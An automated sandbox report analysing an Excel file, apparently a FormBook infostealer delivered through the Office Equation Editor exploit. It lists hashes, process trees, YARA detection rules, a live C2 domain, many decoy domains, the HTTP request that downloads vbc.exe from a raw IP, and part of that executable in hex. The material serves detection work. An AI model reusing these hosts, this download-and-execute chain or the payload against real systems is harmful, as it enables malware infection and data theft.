Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
TedarikciSiparisi_83613 .xlsx

Overview

General Information

Sample Name:TedarikciSiparisi_83613 .xlsx
Analysis ID:626598
MD5:650bb8e5fe570bde782be21c4e9f421c
SHA1:fd3ffa031546f1dfa7ed884689ca1e85941fca1e
SHA256:247838308fb5e12a258def82a63e3a752d1536d1771539d63cebcf283b8154b5
Tags:VelvetSweatshopxlsx
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Shellcode detected
Office equation editor drops PE file
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Office equation editor establishes network connection
Drops PE files to the user root directory
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Enables debug privileges
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Contains functionality to download and execute PE files
Office Equation Editor has been started
Contains functionality to download and launch executables
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 3032 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 2584 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2600 cmdline: "C:\Users\Public\vbc.exe" MD5: CE42FE431B88922AB59B6FD880CADCF6)
      • aspnet_compiler.exe (PID: 2336 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe MD5: 6D0C232D1F4CD357FD7C14ED6FABFA90)
  • cleanup
{"C2 list": ["www.mentalnayaarifmetika.online/ocgr/"], "decoy": ["shiftmedicalstaffing.agency", "muktobangla.xyz", "attmleather.com", "modelahs.com", "clime.email", "yonatec.com", "mftie.com", "doxofcolor.com", "american-atlantic.net", "christineenergy.com", "fjqsdz.com", "nagpurmandarin.com", "hofwimmer.com", "gororidev.com", "china-eros.com", "xn--ekrt15fxyb2t2c.xn--czru2d", "dabsavy.com", "buggy4t.com", "souplant.com", "insurancewineappraisals.com", "012skz.xyz", "kincsemto.net", "zyaxious.website", "tellgalpy.com", "demetbatmaz.com", "wallacehills.com", "chambaultfleurs.com", "fairfieldgroupfw.com", "lotsimprovements.com", "dhslcy.com", "anotherdegen.com", "dearpennyyouradviceblogspot.com", "seekbeforefind.com", "societyalluredmcc.com", "climatecheckin.com", "candybox-eru.com", "tentacionescharlie.com", "exceedrigging.online", "skb-cabinet.com", "qhzhuhang.com", "ccav11.xyz", "sandstonehosting.com", "14offresimportantes.com", "xn--hj2bz6fwvan2be1g5tb.com", "embedded-electronic.com", "drsanaclinic.com", "ageofcryptos.com", "dreamonetnpasumo1.xyz", "engroconnect.net", "huvao.com", "denalicanninglids.com", "tootko.com", "edisson-bd.com", "myamazonloan.net", "dbcyebnveoyu.cloud", "floridacaterpillar.com", "travisjbogard.com", "dialoneconstruction.com", "tubesing.com", "gofilmwizards.com", "tahnforest.com", "salahov.info", "bimcellerviss.com", "garglimited.com"]}
SourceRuleDescriptionAuthorStrings
00000004.00000002.971324155.0000000003667000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000004.00000002.971324155.0000000003667000.00000004.00000800.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x73130:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x734ba:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x7f1cd:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x7ecb9:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x7f2cf:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x7f447:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x73ed2:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x7df34:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x74c4a:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x846bf:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x85762:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000004.00000002.971324155.0000000003667000.00000004.00000800.00020000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x815f1:$sqlite3step: 68 34 1C 7B E1
    • 0x81704:$sqlite3step: 68 34 1C 7B E1
    • 0x81620:$sqlite3text: 68 38 2A 90 C5
    • 0x81745:$sqlite3text: 68 38 2A 90 C5
    • 0x81633:$sqlite3blob: 68 53 D8 7F 8C
    • 0x8175b:$sqlite3blob: 68 53 D8 7F 8C
    SourceRuleDescriptionAuthorStrings
    2.3.EQNEDT32.EXE.6cecd8.0.raw.unpackAPT_NK_Methodology_Artificial_UserAgent_IE_Win7Detects hard-coded User-Agent string that has been present in several APT37 malware families.Steve Miller aka @stvemillertime
    • 0x1728:$a1: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
    • 0x1728:$a2: 4D 6F 7A 69 6C 6C 61 2F 35 2E 30 20 28 57 69 6E 64 6F 77 73 20 4E 54 20 36 2E 31 3B 20 57 4F 57 36 34 3B 20 54 72 69 64 65 6E 74 2F 37 2E 30 3B 20 72 76 3A 31 31 2E 30 29 20 6C 69 6B 65 20 47 ...

    Exploits

    barindex
    Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 180.214.238.224, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2584, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49171
    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2584, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
    No Snort rule has matched

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: 00000004.00000002.971324155.0000000003667000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.mentalnayaarifmetika.online/ocgr/"], "decoy": ["shiftmedicalstaffing.agency", "muktobangla.xyz", "attmleather.com", "modelahs.com", "clime.email", "yonatec.com", "mftie.com", "doxofcolor.com", "american-atlantic.net", "christineenergy.com", "fjqsdz.com", "nagpurmandarin.com", "hofwimmer.com", "gororidev.com", "china-eros.com", "xn--ekrt15fxyb2t2c.xn--czru2d", "dabsavy.com", "buggy4t.com", "souplant.com", "insurancewineappraisals.com", "012skz.xyz", "kincsemto.net", "zyaxious.website", "tellgalpy.com", "demetbatmaz.com", "wallacehills.com", "chambaultfleurs.com", "fairfieldgroupfw.com", "lotsimprovements.com", "dhslcy.com", "anotherdegen.com", "dearpennyyouradviceblogspot.com", "seekbeforefind.com", "societyalluredmcc.com", "climatecheckin.com", "candybox-eru.com", "tentacionescharlie.com", "exceedrigging.online", "skb-cabinet.com", "qhzhuhang.com", "ccav11.xyz", "sandstonehosting.com", "14offresimportantes.com", "xn--hj2bz6fwvan2be1g5tb.com", "embedded-electronic.com", "drsanaclinic.com", "ageofcryptos.com", "dreamonetnpasumo1.xyz", "engroconnect.net", "huvao.com", "denalicanninglids.com", "tootko.com", "edisson-bd.com", "myamazonloan.net", "dbcyebnveoyu.cloud", "floridacaterpillar.com", "travisjbogard.com", "dialoneconstruction.com", "tubesing.com", "gofilmwizards.com", "tahnforest.com", "salahov.info", "bimcellerviss.com", "garglimited.com"]}
    Source: TedarikciSiparisi_83613 .xlsxReversingLabs: Detection: 34%
    Source: Yara matchFile source: 00000004.00000002.971324155.0000000003667000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
    Source: http://180.214.238.224/__cloud_for_file/vbc.exeAvira URL Cloud: Label: malware
    Source: www.mentalnayaarifmetika.online/ocgr/Avira URL Cloud: Label: malware
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeReversingLabs: Detection: 41%
    Source: C:\Users\Public\vbc.exeReversingLabs: Detection: 41%
    Source: C:\Users\Public\vbc.exeJoe Sandbox ML: detected
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJoe Sandbox ML: detected

    Exploits

    barindex
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exeJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 180.214.238.224 Port: 80Jump to behavior
    Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
    Source: Binary string: C:\Users\VICTOR\Downloads\Documents\CryptoObfuscator_Output\BMCXBMXCKSKS.pdb source: EQNEDT32.EXE, 00000002.00000003.953779390.000000000071E000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, vbc.exe.2.dr, vbc[1].exe.2.dr
    Source: Binary string: THEDEVILISHERE.pdb source: vbc.exe, 00000004.00000002.961584082.00000000004D0000.00000004.08000000.00040000.00000000.sdmp, vbc.exe, 00000004.00000002.961770763.00000000021E1000.00000004.00000800.00020000.00000000.sdmp
    Source: Binary string: C:\Users\VICTOR\Downloads\Documents\CryptoObfuscator_Output\BMCXBMXCKSKS.pdbBSJB source: EQNEDT32.EXE, 00000002.00000003.953779390.000000000071E000.00000004.00000020.00020000.00000000.sdmp, vbc.exe.2.dr, vbc[1].exe.2.dr
    Source: Binary string: THEDEVILISHERE.pdbXqnq `q_CorDllMainmscoree.dll source: vbc.exe, 00000004.00000002.961584082.00000000004D0000.00000004.08000000.00040000.00000000.sdmp, vbc.exe, 00000004.00000002.961770763.00000000021E1000.00000004.00000800.00020000.00000000.sdmp

    Software Vulnerabilities

    barindex
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_036306A9 ShellExecuteExW,ExitProcess,2_2_036306A9
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_036305BD LoadLibraryW,URLDownloadToFileW,ShellExecuteExW,ExitProcess,2_2_036305BD
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_036306C7 ExitProcess,2_2_036306C7
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03630648 URLDownloadToFileW,ShellExecuteExW,ExitProcess,2_2_03630648
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03630531 URLDownloadToFileW,ShellExecuteExW,ExitProcess,2_2_03630531
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0363054D URLDownloadToFileW,ShellExecuteExW,ExitProcess,2_2_0363054D
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03630692 ShellExecuteExW,ExitProcess,2_2_03630692
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_036305D7 URLDownloadToFileW,ShellExecuteExW,ExitProcess,2_2_036305D7
    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 180.214.238.224:80
    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 180.214.238.224:80
    Source: excel.exeMemory has grown: Private usage: 4MB later: 63MB

    Networking

    barindex
    Source: Malware configuration extractorURLs: www.mentalnayaarifmetika.online/ocgr/
    Source: Joe Sandbox ViewASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 14 May 2022 13:14:18 GMTServer: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28Last-Modified: Fri, 13 May 2022 09:07:10 GMTETag: "38000-5dee0ffdad130"Accept-Ranges: bytesContent-Length: 229376Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ba 1f 7e 62 00 00 00 00 00 00 00 00 e0 00 2e 01 0b 01 06 00 00 76 03 00 00 7c 03 00 00 00 00 00 ca 95 03 00 00 20 00 00 00 a0 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 03 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 70 95 03 00 57 00 00 00 00 c0 03 00 c8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 03 00 0c 00 00 00 18 50 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d0 75 03 00 00 20 00 00 00 76 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 03 00 00 02 00 00 00 78 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 73 72 63 00 00 00 c8 05 00 00 00 c0 03 00 00 06 00 00 00 7a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac 95 03 00 00 00 00 00 48 00 00 00 02 00 05 00 9c 50 03 00 d4 44 00 00 03 00 02 00 03 00 00 06 08 3d 00 00 10 13 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 22 00 28 0b 00 00 06 00 2a 00 00 00 03 30 09 00 07 00 00 00 00 00 00 00 02 28 3e 00 00 0a 2a 00 13 30 08 00 36 02 00 00 01 00 00 11 2b 07 26 16 28 11 00 00 06 1a 28 11 00 00 06 1e 28 11 00 00 06 3a e9 01 00 00 18 45 01 00 00 00 f6 ff ff ff 17 2d 06 d0 03 00 00 06 26 26 00 17 28 18 00 00 06 20 79 e7 07 00 28 18 00 00 06 25 26 20 7e e7 07 00 28 18 00 00 06 25 26 28 7f 00 00 06 20 81 e7 07 00 28 18 00 00 06 20 88 e7 07 00 28 18 00 00 06 28 80 00 00 06 20 8b e7 07 00 28 18 00 00 06 20 8e e7 07 00 28 18 00 00 06 28 80 00 00 06 20 91 e7 07 00 28 18 00 00 06 20 94 e7 07 00 28 18 00 00 06 25 26 28 80 00 00 06 20 97 e7 07 00 28 18 00 00 06 25 26 20 a0 e7 07 00 28 18 00 00 06 28 80 00 00 06 0a 1f 0c 28 11 00 00 06 28 06 00 00 06 3a 0d 01 00 00 1a 45 01 00 00 00 f6 ff ff ff 26 1f 10 28 11 00 00 06 1f 14 28 11 00 00 06 39 19 01 00 00 26 06 28 a4 00 00 06 0b 1f 18 28 11 00 00 06 28 05 0
    Source: global trafficHTTP traffic detected: GET /__cloud_for_file/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 180.214.238.224Connection: Keep-Alive
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_036305BD LoadLibraryW,URLDownloadToFileW,ShellExecuteExW,ExitProcess,2_2_036305BD
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: EQNEDT32.EXE, 00000002.00000002.956128878.00000000006B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
    Source: EQNEDT32.EXE, 00000002.00000002.956128878.00000000006B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
    Source: EQNEDT32.EXE, 00000002.00000002.956128878.00000000006B4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.953845845.00000000006F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://180.214.238.224/__cloud_for_file/vbc.exe
    Source: EQNEDT32.EXE, 00000002.00000003.953845845.00000000006F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://180.214.238.224/__cloud_for_file/vbc.exe95C:
    Source: EQNEDT32.EXE, 00000002.00000002.956128878.00000000006B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://180.214.238.224/__cloud_for_file/vbc.exeX
    Source: EQNEDT32.EXE, 00000002.00000002.956107839.0000000000696000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://180.214.238.224/__cloud_for_file/vbc.exehhC:
    Source: EQNEDT32.EXE, 00000002.00000002.956562108.0000000003630000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://180.214.238.224/__cloud_for_file/vbc.exej
    Source: EQNEDT32.EXE, 00000002.00000003.953884228.000000000071C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://180.214.238.224/__cloud_for_file/vbc.exeu
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2DC1A5DE.emfJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_036305BD LoadLibraryW,URLDownloadToFileW,ShellExecuteExW,ExitProcess,2_2_036305BD
    Source: global trafficHTTP traffic detected: GET /__cloud_for_file/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 180.214.238.224Connection: Keep-Alive

    E-Banking Fraud

    barindex
    Source: Yara matchFile source: 00000004.00000002.971324155.0000000003667000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

    System Summary

    barindex
    Source: 00000004.00000002.971324155.0000000003667000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 00000004.00000002.971324155.0000000003667000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
    Source: 2.3.EQNEDT32.EXE.6cecd8.0.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_Methodology_Artificial_UserAgent_IE_Win7 hash1 = e63efbf8624a531bb435b7446dbbfc25, author = Steve Miller aka @stvemillertime, description = Detects hard-coded User-Agent string that has been present in several APT37 malware families., score =
    Source: 00000004.00000002.971324155.0000000003667000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
    Source: 00000004.00000002.971324155.0000000003667000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
    Source: C:\Users\Public\vbc.exeCode function: 4_2_003358D34_2_003358D3
    Source: C:\Users\Public\vbc.exeCode function: 4_2_002E24D04_2_002E24D0
    Source: C:\Users\Public\vbc.exeCode function: 4_2_002E56104_2_002E5610
    Source: C:\Users\Public\vbc.exeCode function: 4_2_002E06784_2_002E0678
    Source: C:\Users\Public\vbc.exeCode function: 4_2_002E1CE84_2_002E1CE8
    Source: C:\Users\Public\vbc.exeCode function: 4_2_002E1CE74_2_002E1CE7
    Source: C:\Users\Public\vbc.exeCode function: 4_2_002E65A04_2_002E65A0
    Source: C:\Users\Public\vbc.exeCode function: 4_2_002E06384_2_002E0638
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 77620000 page execute and read and writeJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 77740000 page execute and read and writeJump to behavior
    Source: C:\Users\Public\vbc.exeMemory allocated: 77620000 page execute and read and writeJump to behavior
    Source: C:\Users\Public\vbc.exeMemory allocated: 77740000 page execute and read and writeJump to behavior
    Source: vbc.exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: vbc[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: TedarikciSiparisi_83613 .xlsxReversingLabs: Detection: 34%
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
    Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
    Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe" Jump to behavior
    Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$TedarikciSiparisi_83613 .xlsxJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR5F10.tmpJump to behavior
    Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@6/18@0/1
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
